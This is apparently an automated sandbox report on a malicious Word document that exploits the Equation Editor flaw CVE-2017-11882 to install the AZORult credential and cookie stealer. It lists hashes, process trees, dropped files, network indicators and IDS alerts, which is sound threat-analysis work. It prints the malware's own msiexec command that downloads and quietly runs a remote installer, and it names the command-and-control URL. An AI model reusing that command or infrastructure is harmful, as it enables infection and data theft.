analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DY_POWER_BLCMPL_141800.doc

Full analysis: https://app.any.run/tasks/c684afa3-867d-4284-b21f-18bb97a10187
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: November 14, 2018, 07:45:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
exe-to-msi
loader
rat
azorult
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

BE31B52757BA2B8DB9618D000A20D8DC

SHA1:

38B5899DE41691BCA03BF87368668088CD9C78BC

SHA256:

97117F7F2708960DBB4080E3CD458389C7EEA8787E513AC0641A22C65E40AEFD

SSDEEP:

768:QmKfcZpEHUqUisx+NLBZ3KeD0G1Ig/BKo5g/5m5SfDkfMYBgQ8y+Wh7yK:Q4ZcUisxYtpnUNyz7n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2892)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3500)
    • Actions looks like stealing of personal data

      • MSI3D26.tmp (PID: 3708)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3804)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3804)
    • AZORULT was detected

      • MSI3D26.tmp (PID: 3708)
    • Connects to CnC server

      • MSI3D26.tmp (PID: 3708)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3500)
      • MSI3D26.tmp (PID: 3708)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3804)
      • MSI3D26.tmp (PID: 3708)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3804)
    • Creates files in the user directory

      • MSI3D26.tmp (PID: 3708)
    • Reads the cookies of Google Chrome

      • MSI3D26.tmp (PID: 3708)
    • Reads the cookies of Mozilla Firefox

      • MSI3D26.tmp (PID: 3708)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3460)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3460)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3804)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3500)
    • Application was dropped or rewritten from another process

      • MSI3D26.tmp (PID: 3708)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3804)
    • Loads dropped or rewritten executable

      • MSI3D26.tmp (PID: 3708)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe #AZORULT msi3d26.tmp cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3460"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DY_POWER_BLCMPL_141800.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3500"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2892cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/5.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2364msiexec.exe /i http://34.244.180.39/5.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3804C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3708"C:\Windows\Installer\MSI3D26.tmp"C:\Windows\Installer\MSI3D26.tmp
msiexec.exe
User:
admin
Company:
Softpointer Inc
Integrity Level:
MEDIUM
Description:
Sparse Nanometer Effects Void Mbiers
Exit code:
0
2596"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "MSI3D26.tmp"C:\Windows\system32\cmd.exeMSI3D26.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3352C:\Windows\system32\timeout.exe 3 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 634
Read events
926
Write events
0
Delete events
0

Modification events

No data
Executable files
50
Suspicious files
2
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
3460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3071.tmp.cvr
MD5:
SHA256:
3804msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF24F9EDF1D3DE4D6A.TMP
MD5:
SHA256:
3460WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3804msiexec.exeC:\Windows\Installer\MSI389F.tmpexecutable
MD5:FB6B511E96E7BBFEC6DFCD14FC049430
SHA256:9EE631BDB3AC7552254386A3AEEE6D8A3342D2D3F5B4E578A15A6800227680D3
3804msiexec.exeC:\Windows\Installer\MSI3D26.tmpexecutable
MD5:01329D37BDAF5C58D2F1FF8B4F3900F2
SHA256:5A29A74994308E3C2E900653EB95525BF8E7E4926CD7965D61684EBA0B061FDB
3460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_POWER_BLCMPL_141800.docpgc
MD5:A0429BB8B4E3273DE2187B3B9B096C55
SHA256:A5A49003E7D5289611EB487F1F022638A74C793EA3D6758E1A0A85E5A0D4F37E
3804msiexec.exeC:\Windows\Installer\183b5f.ipibinary
MD5:9BC43BA0F5BD660414451EA48E9094CB
SHA256:7D5BFBDB980BC6FA6E0CB40DFB04694B9BDEACD85F85E54F3E084049FDA57C83
3804msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:74593DA273B27EA9E6ADDEA19D7746A0
SHA256:83F2686E301182C24294A15B57EA9A3540330AF35F13153C3A8C243D0F655BCB
3804msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3804msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\0C8JY2B5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3804
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/5.msi
IE
executable
696 Kb
suspicious
3708
MSI3D26.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/michytery/index.php
HK
binary
4.27 Mb
malicious
3708
MSI3D26.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/michytery/index.php
HK
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3804
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious
3708
MSI3D26.tmp
103.63.2.245:80
slimiyt.us
Guochao Group limited
HK
suspicious

DNS requests

Domain
IP
Reputation
slimiyt.us
  • 103.63.2.245
malicious

Threats

PID
Process
Class
Message
3804
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3804
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3804
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3804
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3708
MSI3D26.tmp
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
3708
MSI3D26.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
3708
MSI3D26.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
3708
MSI3D26.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
3708
MSI3D26.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
4 ETPRO signatures available at the full report
No debug info